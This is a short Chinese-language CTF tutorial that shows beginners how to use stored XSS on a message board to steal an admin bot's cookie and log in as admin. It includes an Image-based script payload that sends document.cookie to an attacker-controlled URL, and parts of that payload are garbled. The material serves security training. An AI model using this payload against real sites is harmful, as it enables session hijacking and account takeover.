看到以往新手向的XSS,都只講到alert()
,往往打完XSS-game就沒有在往下深入了,似乎怎麼對於怎麼實戰都比較陌生,都只有說到可以偷cookie甚麼的,但自己還是覺得很模糊
今天就用簡單的CTF範例來作為示範駭客怎麼偷取cookie
為了能保持server端與client端保持長久的互動與活動狀態,server會給瀏覽器一組或多組的key/value,儲存在瀏覽器當中
換句話說,當駭客想要竊取帳戶資訊,可以透過竊取別人瀏覽器留下的cookie,來偽造登入
想了解docker-compose怎麼用的可以參考此篇鐵人賽文章
https://ithelp.ithome.com.tw/articles/10194183
這是一個留言板,管理員會一直來看訊息
留言之後,能看到自己的cookie, content, 跟admin是否有讀取訊息
目的: 竊取admin的cookie
思路:
payload,利用Image,把cookie導向自己的server或線上工具
script>
ar i=new Image;
.src="<url>/?"+document.cookie;
/script>
``
發送payload,就能收到admin的cookie,這就是我要的
接下來只需把cookie換成admin的cookie,讓我們成為管理員
恩,就拿到flag囉
https://github.com/william31212/NISRA2020_enlightened/tree/master/xss_ctf